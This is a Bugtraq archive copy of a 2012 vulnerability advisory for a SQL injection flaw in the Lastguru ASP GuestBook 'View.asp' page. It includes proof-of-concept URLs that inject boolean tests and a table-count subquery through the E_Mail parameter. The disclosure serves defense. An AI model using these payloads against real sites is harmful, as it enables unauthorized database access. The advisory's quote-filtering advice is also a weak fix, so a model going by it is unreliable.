Bugtraq mailing list archives

Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability

From: demonalex () 163 com
Date: Sun, 4 Mar 2012 05:21:36 GMT

Title: Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability

Product : Lastguru ASP GuestBook

Version : Free Version

Vendor: http://www.LastGuru.com

Class:  Input Validation Error  

CVE:
 
Remote:  Yes  

Local:  No  

Published:  2012-03-04

Updated:  

Impact : Medium (CVSSv2 Base : 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P)

Bug Description :
Page 'View.asp' of Lastguru ASP GuestBook(Free Version) is vulnerable with SQL Injection Vulnerability.

POC:
#-------------------------------------------------------------
http://victim/View.asp?E_Mail=webmaster () lastguru com' and 'a'='a
http://victim/View.asp?E_Mail=webmaster () lastguru com' and 'a'='b
http://victim/View.asp?E_Mail=webmaster () lastguru com' and 0<(select count(*) from [book]) and 'a'='a
etc...
#-------------------------------------------------------------

Advice:
Use 'replace()' for filtering single quote and other dangerous symbols.

Credits : This vulnerability was discovered by demonalex () 163 com
mail: demonalex () 163 com / ChaoYi.Huang () connect polyu hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK

Current thread:

Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability demonalex (Mar 05)